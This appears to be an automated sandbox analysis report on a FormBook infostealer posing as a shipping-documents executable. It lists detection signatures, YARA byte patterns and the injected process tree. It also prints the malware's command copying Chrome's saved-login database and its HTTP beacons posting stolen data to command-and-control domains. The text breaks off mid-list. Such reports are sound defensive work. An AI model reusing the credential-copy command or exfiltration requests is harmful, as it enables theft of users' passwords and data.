Play interactive tourEdit tour

# Analysis Report 8976547shipping docs45890.exe

## Overview

### General Information

 Sample Name: 8976547shipping docs45890.exe MD5: 9c0050d6507ac9f040f7fa1aeb3bf1e7 SHA1: eb4a60e4629cc227f115b5a87f8281feafc146f0 SHA256: db4248d551714a38cb449dad526ce0f34c6fd84de269d15f579273623a4ed432 Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Sigma detected: Suspicious Process Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x648976547shipping docs45890.exe (PID: 1496 cmdline: 'C:\Users\user\Desktop\8976547shipping docs45890.exe' MD5: 9C0050D6507AC9F040F7FA1AEB3BF1E7)AddInProcess32.exe (PID: 5912 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)NETSTAT.EXE (PID: 5788 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)cmd.exe (PID: 960 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 3164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)cmd.exe (PID: 5224 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)vnwl96s0uroti.exe (PID: 4240 cmdline: C:\Program Files (x86)\Ohfrhgbex\vnwl96s0uroti.exe MD5: F2A47587431C466535F3C3D3427724BE)conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
8976547shipping docs45890.exeJoeSecurity_FormBookYara detected FormBookJoe Security
8976547shipping docs45890.exeFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x74850:\$sqlite3step: 68 34 1C 7B E1
• 0x7497d:\$sqlite3step: 68 34 1C 7B E1
• 0x7491c:\$sqlite3text: 68 38 2A 90 C5
• 0x7541e:\$sqlite3text: 68 38 2A 90 C5
• 0x7492f:\$sqlite3blob: 68 53 D8 7F 8C
• 0x75434:\$sqlite3blob: 68 53 D8 7F 8C
8976547shipping docs45890.exeFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x59805:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x59aab:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x6f5ae:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x6ee9d:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x7008d:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x6ff35:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x6d7c1:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x5cfcd:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x796d9:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x7ab23:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
.textJoeSecurity_FormBookYara detected FormBookJoe Security
.textFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x74650:\$sqlite3step: 68 34 1C 7B E1
• 0x7477d:\$sqlite3step: 68 34 1C 7B E1
• 0x7471c:\$sqlite3text: 68 38 2A 90 C5
• 0x7521e:\$sqlite3text: 68 38 2A 90 C5
• 0x7472f:\$sqlite3blob: 68 53 D8 7F 8C
• 0x75234:\$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries
SourceRuleDescriptionAuthorStrings
00000007.00000002.1004663953.0000000001720000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000007.00000002.1004663953.0000000001720000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18429:\$sqlite3step: 68 34 1C 7B E1
• 0x1853c:\$sqlite3step: 68 34 1C 7B E1
• 0x18458:\$sqlite3text: 68 38 2A 90 C5
• 0x1857d:\$sqlite3text: 68 38 2A 90 C5
• 0x1846b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x18593:\$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.1004663953.0000000001720000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98b8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b22:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x157a5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15291:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x158a7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x15a1f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa69a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1450c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb393:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1ab17:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1bb1a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.1003686582.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000007.00000002.1003686582.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18429:\$sqlite3step: 68 34 1C 7B E1
• 0x1853c:\$sqlite3step: 68 34 1C 7B E1
• 0x18458:\$sqlite3text: 68 38 2A 90 C5
• 0x1857d:\$sqlite3text: 68 38 2A 90 C5
• 0x1846b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x18593:\$sqlite3blob: 68 53 D8 7F 8C
Click to see the 46 entries
SourceRuleDescriptionAuthorStrings
7.2.AddInProcess32.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18429:\$sqlite3step: 68 34 1C 7B E1
• 0x1853c:\$sqlite3step: 68 34 1C 7B E1
• 0x18458:\$sqlite3text: 68 38 2A 90 C5
• 0x1857d:\$sqlite3text: 68 38 2A 90 C5
• 0x1846b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x18593:\$sqlite3blob: 68 53 D8 7F 8C
7.2.AddInProcess32.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98b8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b22:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x157a5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15291:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x158a7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x15a1f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa69a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1450c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb393:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1ab17:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1bb1a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.AddInProcess32.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x17629:\$sqlite3step: 68 34 1C 7B E1
• 0x1773c:\$sqlite3step: 68 34 1C 7B E1
• 0x17658:\$sqlite3text: 68 38 2A 90 C5
• 0x1777d:\$sqlite3text: 68 38 2A 90 C5
• 0x1766b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x17793:\$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

## Sigma Overview

### System Summary:

 Source: Process started Author: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\NETSTAT.EXE, ParentImage: C:\Windows\SysWOW64\NETSTAT.EXE, ParentProcessId: 5788, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 5224
 Sigma detected: Suspicious Process Creation Show sources
 Source: Process started Author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update): Data: Command: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, CommandLine: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, ParentCommandLine: 'C:\Users\user\Desktop\8976547shipping docs45890.exe' , ParentImage: C:\Users\user\Desktop\8976547shipping docs45890.exe, ParentProcessId: 1496, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, ProcessId: 5912

## Signature Overview

### AV Detection:

 Multi AV Scanner detection for submitted file Show sources
 Source: 8976547shipping docs45890.exe Virustotal: Detection: 17% Perma Link
 Yara detected FormBook Show sources
 Source: Yara match File source: 8976547shipping docs45890.exe, type: SAMPLE Source: Yara match File source: .text, type: SAMPLE Source: Yara match File source: 00000007.00000002.1004663953.0000000001720000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000007.00000002.1003686582.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.933776765.0000000005AA9000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.935322277.0000000000492000.00000002.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.933634572.0000000005AA5000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000A.00000002.1257946906.0000000000C30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.942193386.0000000005B21000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.937457444.0000000002900000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000007.00000002.1004742877.0000000001750000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.933747174.0000000005AA8000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.932794543.0000000005B15000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.934367034.0000000005B21000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000A.00000002.1259601470.0000000001090000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000A.00000002.1259461875.0000000001060000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.836537863.0000000000492000.00000002.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.937952216.0000000002989000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.939997118.0000000003952000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.940144120.00000000039BE000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.8976547shipping docs45890.exe.490000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.8976547shipping docs45890.exe.490000.0.unpack, type: UNPACKEDPE
 Machine Learning detection for sample Show sources
 Source: 8976547shipping docs45890.exe Joe Sandbox ML: detected
 Antivirus or Machine Learning detection for unpacked file Show sources

 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\user\Desktop\8976547shipping docs45890.exe Code function: 4x nop then pop edi 0_2_00506097 Source: C:\Users\user\Desktop\8976547shipping docs45890.exe Code function: 4x nop then pop edi 0_2_00506167 Source: C:\Users\user\Desktop\8976547shipping docs45890.exe Code function: 4x nop then pop edi 0_2_00506138 Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 4x nop then pop ebx 7_2_00407AC6 Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 4x nop then pop edi 7_2_0040E55E Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 4x nop then pop edi 7_2_00417D8F Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop ebx 10_2_00C37AC6 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 10_2_00C47D8F Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 10_2_00C3E55E Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 10_2_00C46D3E

### Networking:

 Uses netstat to query active network connections and open ports Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /m1d/?S4=jnOL&mVkP=N6VmRRP7b8JeQkf5f2VBjAp6cI3WzG30MtPpJduncWM5SOUqIZbVVA6QVLWDL0OQjPyD HTTP/1.1Host: www.healing-with-touch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m1d/?mVkP=aeApkG2QXy/NqgXwqypxNhYc1dg15pNH4qhXr6f69huGXQ1g51qT6a7czmC8py8kAo48&S4=jnOL HTTP/1.1Host: www.deeperootscbd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /m1d/ HTTP/1.1Host: www.deeperootscbd.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.deeperootscbd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.deeperootscbd.com/m1d/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6d 56 6b 50 3d 53 38 4d 54 36 68 37 5a 4c 57 4c 46 35 53 28 63 6f 6c 77 2d 62 6b 63 69 32 63 77 38 79 39 42 4f 67 4b 67 50 77 34 7a 59 32 7a 71 64 64 44 6f 35 7e 32 58 59 32 50 4c 64 70 32 65 36 77 6e 4d 36 66 4c 52 59 67 51 70 4b 7e 70 7a 5a 68 34 58 69 34 69 7e 69 50 52 79 73 44 37 4a 5a 72 5a 64 4d 33 4b 39 4e 56 47 55 59 57 43 51 5a 67 77 4b 63 52 76 59 55 79 55 37 79 39 54 54 38 62 53 59 56 69 32 4b 4d 54 57 33 51 54 73 70 32 43 75 49 51 63 48 68 6d 76 76 78 4e 6c 74 4d 57 38 33 35 57 56 70 6e 6b 31 6f 4a 31 62 78 5a 78 30 6f 6f 77 34 71 6e 72 49 71 41 68 47 34 53 4f 66 45 47 76 6c 63 36 5f 6c 37 41 6c 59 4e 32 57 51 76 6b 42 6d 63 71 71 64 64 37 50 7a 69 42 37 73 64 78 70 49 7a 44 65 6a 57 70 2d 7a 6b 42 70 38 79 74 59 6d 79 47 41 63 78 68 4d 30 65 42 75 37 76 4b 67 4c 57 4e 7a 37 67 58 66 62 38 35 66 43 70 79 73 68 4c 47 68 43 49 6f 35 6c 48 39 44 6c 4e 45 6a 71 7a 7e 65 6f 36 33 4c 72 72 6e 64 76 6f 45 78 39 52 37 4f 53 46 4d 44 6b 36 78 62 6a 5a 6c 34 39 45 58 45 72 48 31 72 4b 49 79 72 77 2d 79 4a 70 49 31 4e 44 6f 32 71 54 4b 55 4f 4c 6b 46 62 6e 4b 52 4f 67 65 64 53 6d 75 41 73 79 77 79 5a 53 37 38 43 66 38 69 6b 71 46 61 35 77 4d 67 49 42 6e 48 2d 51 35 73 4c 7e 47 68 37 74 37 78 41 50 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: mVkP=S8MT6h7ZLWLF5S(colw-bkci2cw8y9BOgKgPw4zY2zqddDo5~2XY2PLdp2e6wnM6fLRYgQpK~pzZh4Xi4i~iPRysD7JZrZdM3K9NVGUYWCQZgwKcRvYUyU7y9TT8bSYVi2KMTW3QTsp2CuIQcHhmvvxNltMW835WVpnk1oJ1bxZx0oow4qnrIqAhG4SOfEGvlc6_l7AlYN2WQvkBmcqqdd7PziB7sdxpIzDejWp-zkBp8ytYmyGAcxhM0eBu7vKgLWNz7gXfb85fCpyshLGhCIo5lH9DlNEjqz~eo63LrrndvoEx9R7OSFMDk6xbjZl49EXErH1rKIyrw-yJpI1NDo2qTKUOLkFbnKROgedSmuAsywyZS78Cf8ikqFa5wMgIBnH-Q5sL~Gh7t7xAPA). Source: global traffic HTTP traffic detected: POST /m1d/ HTTP/1.1Host: www.deeperootscbd.comConnection: closeContent-Length: 185462Cache-Control: no-cacheOrigin: http://www.deeperootscbd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.deeperootscbd.com/m1d/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6d 56 6b 50 3d 53 38 4d 54 36 6a 62 4e 4a 6d 4f 5a 7e 67 58 69 74 57 64 33 53 56 30 73 35 4d 45 67 70 4b 4e 38 76 4e 51 66 77 35 44 45 39 53 61 44 5a 6a 59 35 34 77 72 62 28 50 4c 63 76 32 65 37 6e 33 4a 4e 41 4a 52 51 67 56 5a 6b 7e 70 37 65 36 4f 72 37 38 69 7e 4c 4e 78 32 55 46 37 31 4f 72 62 5a 74 30 73 6b 4f 65 6d 59 59 59 55 34 62 6c 52 61 48 42 65 55 68 77 6b 6d 34 37 51 66 68 63 67 63 44 77 6c 33 66 46 44 58 6f 43 71 5a 39 4e 4b 4e 48 59 55 78 31 79 75 42 47 72 4f 77 4a 28 51 6f 66 53 6f 6e 53 70 38 39 30 53 68 78 5f 69 66 45 4f 7e 62 6a 65 4b 36 77 66 47 5f 75 30 63 47 44 33 68 64 32 6e 69 4a 30 50 53 66 62 51 4d 4d 38 6a 69 61 66 61 66 64 72 67 28 48 6c 67 6e 64 74 47 50 32 65 44 39 45 49 49 78 56 64 31 6f 32 70 73 69 6a 4f 59 44 69 34 55 35 38 68 35 7a 65 6d 34 49 55 42 52 31 67 57 4c 64 4d 35 59 57 62 72 62 6b 6f 71 6d 4d 34 59 48 68 45 4e 61 76 39 59 67 70 31 7e 6f 6d 5f 66 47 34 71 28 5a 67 37 38 4a 33 53 58 4a 5a 47 51 6f 75 61 78 50 70 37 39 7a 39 45 57 39 72 43 4d 41 4e 70 32 72 79 71 28 46 76 70 31 4a 55 59 32 4e 66 36 45 32 42 32 42 79 6e 4f 31 4f 6d 5f 4d 46 6e 64 51 73 34 47 32 61 53 66 51 43 59 4d 69 6b 69 6c 61 33 39 5f 64 47 5a 77 69 5a 42 50 64 34 31 78 34 71 70 61 38 34 4e 74 6c 34 79 6e 71 50 6c 48 69 69 61 4e 42 44 59 50 58 47 6f 49 32 43 54 4e 37 63 71 77 31 7a 6e 79 7a 67 6b 74 57 71 69 75 34 49 69 67 30 7a 4d 5f 59 4c 51 42 34 59 6c 33 41 66 56 4b 57 34 61 67 33 70 64 64 62 55 59 4e 73 66 32 52 6f 30 66 56 7a 6b 78 69 75 45 47 4d 46 30 71 6a 65 52 5a 44 68 6a 74 45 49 63 56 70 7e 6f 68 4b 57 55 49 59 37 6f 4d 42 6f 50 76 5a 7a 33 75 39 43 4c 30 57 44 73 44 64 7e 47 54 53 33 68 43 55 61 4e 49 64 57 70 68 52 49 71 70 58 54 66 4f 51 53 7a 76 77 48 75 70 36 4e 57 68 53 54 34 4c 41 6b 5a 55 69 78 68 6e 55 39 32 7a 46 47 4d 38 46 66 77 57 35 54 73 62 69 46 78 6b 4d 62 43 52 44 35 44 62 4f 54 33 75 6f 73 31 46 53 51 44 6a 7a 70 57 4a 50 38 70 42 64 68 2d 4f 31 6b 5f 77 47 7e 6a 57 75 72 6a 54 31 5a 4e 32 4d 79 6e 4d 65 54 53 6b 41 4d 46 41 49 50 69 49 63 55 74 39 4d 46 54 42 4f 6f 36 69 4f 39 73 59 66 66 7a 78 33 45 33 30 31 76 57 76 76 57 67 32 4b 63 64 46 76 4a 6f 58 4e 59 4e 69 56 46 6f 31 6d 59 6f 31 4d 48 7a 55 62 5a 71 4b 34 48 30 44 41 79 33 79 61 6b 4a 45 30 7a 47 28 70 4f 50 71 6f 37 32 35 5f 7a 57 35 58 44 61 75 56 47 66 76 4e 5a 65 28 71 63 57 66 73 58 69 53 55 76 6c 50 6e 47 4e 49 69 7e 78 42 54 59 70 49 63 50 68 46 34 37 56 41 45 4d 47 6e 5f 66 2d 34 31 4f 62 49 70 54 45 33 42 76 66 50 72 6c 39 41 50 7e 6a 4c 61 57 44 67 39 54 61 78 37 51 54 30 4b 45 34 78 6c 33 79 62 4e 59 48 7e 79 48 6e 6e 4a 51 75 3
 Source: global traffic HTTP traffic detected: GET /m1d/?S4=jnOL&mVkP=N6VmRRP7b8JeQkf5f2VBjAp6cI3WzG30MtPpJduncWM5SOUqIZbVVA6QVLWDL0OQjPyD HTTP/1.1Host: www.healing-with-touch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m1d/?mVkP=aeApkG2QXy/NqgXwqypxNhYc1dg15pNH4qhXr6f69huGXQ1g51qT6a7czmC8py8kAo48&S4=jnOL HTTP/1.1Host: www.deeperootscbd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: cdn.onenote.net
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /m1d/ HTTP/1.1Host: www.deeperootscbd.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.deeperootscbd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.deeperootscbd.com/m1d/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6d 56 6b 50 3d 53 38 4d 54 36 68 37 5a 4c 57 4c 46 35 53 28 63 6f 6c 77 2d 62 6b 63 69 32 63 77 38 79 39 42 4f 67 4b 67 50 77 34 7a 59 32 7a 71 64 64 44 6f 35 7e 32 58 59 32 50 4c 64 70 32 65 36 77 6e 4d 36 66 4c 52 59 67 51 70 4b 7e 70 7a 5a 68 34 58 69 34 69 7e 69 50 52 79 73 44 37 4a 5a 72 5a 64 4d 33 4b 39 4e 56 47 55 59 57 43 51 5a 67 77 4b 63 52 76 59 55 79 55 37 79 39 54 54 38 62 53 59 56 69 32 4b 4d 54 57 33 51 54 73 70 32 43 75 49 51 63 48 68 6d 76 76 78 4e 6c 74 4d 57 38 33 35 57 56 70 6e 6b 31 6f 4a 31 62 78 5a 78 30 6f 6f 77 34 71 6e 72 49 71 41 68 47 34 53 4f 66 45 47 76 6c 63 36 5f 6c 37 41 6c 59 4e 32 57 51 76 6b 42 6d 63 71 71 64 64 37 50 7a 69 42 37 73 64 78 70 49 7a 44 65 6a 57 70 2d 7a 6b 42 70 38 79 74 59 6d 79 47 41 63 78 68 4d 30 65 42 75 37 76 4b 67 4c 57 4e 7a 37 67 58 66 62 38 35 66 43 70 79 73 68 4c 47 68 43 49 6f 35 6c 48 39 44 6c 4e 45 6a 71 7a 7e 65 6f 36 33 4c 72 72 6e 64 76 6f 45 78 39 52 37 4f 53 46 4d 44 6b 36 78 62 6a 5a 6c 34 39 45 58 45 72 48 31 72 4b 49 79 72 77 2d 79 4a 70 49 31 4e 44 6f 32 71 54 4b 55 4f 4c 6b 46 62 6e 4b 52 4f 67 65 64 53 6d 75 41 73 79 77 79 5a 53 37 38 43 66 38 69 6b 71 46 61 35 77 4d 67 49 42 6e 48 2d 51 35 73 4c 7e 47 68 37 74 37 78 41 50 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: mVkP=S8MT6h7ZLWLF5S(colw-bkci2cw8y9BOgKgPw4zY2zqddDo5~2XY2PLdp2e6wnM6fLRYgQpK~pzZh4Xi4i~iPRysD7JZrZdM3K9NVGUYWCQZgwKcRvYUyU7y9TT8bSYVi2KMTW3QTsp2CuIQcHhmvvxNltMW835WVpnk1oJ1bxZx0oow4qnrIqAhG4SOfEGvlc6_l7AlYN2WQvkBmcqqdd7PziB7sdxpIzDejWp-zkBp8ytYmyGAcxhM0eBu7vKgLWNz7gXfb85fCpyshLGhCIo5lH9DlNEjqz~eo63LrrndvoEx9R7OSFMDk6xbjZl49EXErH1rKIyrw-yJpI1NDo2qTKUOLkFbnKROgedSmuAsywyZS78Cf8ikqFa5wMgIBnH-Q5sL~Gh7t7xAPA).
 Urls found in memory or binary data Show sources
 Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: explorer.exe, 00000008.00000000.948626276.0000000000CF0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: NETSTAT.EXE, 0000000A.00000002.1263971889.0000000003AF9000.00000004.00000001.sdmp String found in binary or memory: http://www.deeperootscbd.com Source: NETSTAT.EXE, 0000000A.00000002.1263971889.0000000003AF9000.00000004.00000001.sdmp String found in binary or memory: http://www.deeperootscbd.com/m1d/ Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: explorer.exe, 